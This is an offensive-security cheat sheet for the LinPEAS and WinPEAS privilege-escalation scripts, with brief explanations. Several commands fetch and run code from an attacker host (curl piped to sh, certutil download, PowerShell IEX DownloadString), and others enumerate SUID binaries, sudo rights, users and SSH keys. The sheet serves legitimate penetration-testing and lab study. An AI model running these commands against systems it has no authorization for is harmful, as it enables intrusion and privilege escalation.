privesc

LinPEAS & WinPEAS — Privilege Escalation Scripts

PEASS-ng scripts for automated local privilege escalation enumeration on Linux and Windows.

8 views Apr 2026 lazyhackers

LinPEAS — Linux (7)

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Download and run LinPEAS (pipe to sh)

linpeas run

curl -Lo linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

Download, make executable, run

linpeas run

./linpeas.sh 2>/dev/null | tee linpeas_output.txt

Run and save output to file

linpeas output

./linpeas.sh -a

All checks (slower but thorough)

linpeas all

./linpeas.sh -s

Super fast mode (less checks)

linpeas fast

./linpeas.sh -q

Quiet mode — less noise in output

linpeas quiet

python3 -m http.server 8080 # on attacker; curl http://10.10.14.1:8080/linpeas.sh | sh

Serve linpeas from attacker box, run in memory

linpeas serve memory

LinPEAS — Key Findings to Check (9)

# Look for: Red/Yellow highlighted items first

Red = critical finding, Yellow = interesting

linpeas findings

find / -perm -4000 -type f 2>/dev/null

Find SUID binaries manually

suid privesc

find / -perm -2000 -type f 2>/dev/null

Find SGID binaries

sgid privesc

sudo -l

List sudo permissions for current user

sudo privesc

cat /etc/crontab && ls -la /etc/cron*

Check cron jobs

cron privesc

find / -writable -not -path "/proc/*" -not -path "/sys/*" 2>/dev/null

Find world-writable files/dirs

writable privesc

cat /etc/passwd | grep -v nologin | grep -v false

Find users with shells

users enum

ss -tlnp && netstat -tlnp 2>/dev/null

List listening ports

ports enum

ls -la /home && ls -la ~/.ssh/

Check home dirs and SSH keys

ssh enum

WinPEAS — Windows (8)

.\winPEASx64.exe

Run WinPEAS 64-bit

winpeas run x64

.\winPEASx86.exe

Run WinPEAS 32-bit

winpeas run x86

.\winPEASx64.exe > winpeas_output.txt

Run and save output to file

winpeas output

.\winPEASx64.exe quiet

Quiet mode — suppress banner

winpeas quiet

.\winPEASx64.exe systeminfo

System info only

winpeas sysinfo

.\winPEASx64.exe servicesinfo

Services info only

winpeas services

certutil -urlcache -split -f http://10.10.14.1:8080/winPEASx64.exe winpeas.exe

Download WinPEAS via certutil

winpeas download certutil

IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.1:8080/winPEASx64.ps1")

Download and run WinPEAS PS1 in memory

winpeas powershell memory

WinPEAS — Key Manual Checks (6)

whoami /priv

List current user privileges (look for SeImpersonate, SeDebug)

priv windows

whoami /all

Full user context, groups, and privileges

priv windows

net user && net localgroup administrators

List users and local admins

users enum

wmic service get name,startname,pathname,startmode 2>nul | findstr /i "auto" | findstr /i /v "c:\windows"

Find non-standard auto-start services

services privesc

reg query HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Check AlwaysInstallElevated (MSI privesc)

registry privesc msi

schtasks /query /fo LIST /v | findstr /i "task name\|run as\|task to run"

List scheduled tasks with run-as context

scheduled-tasks privesc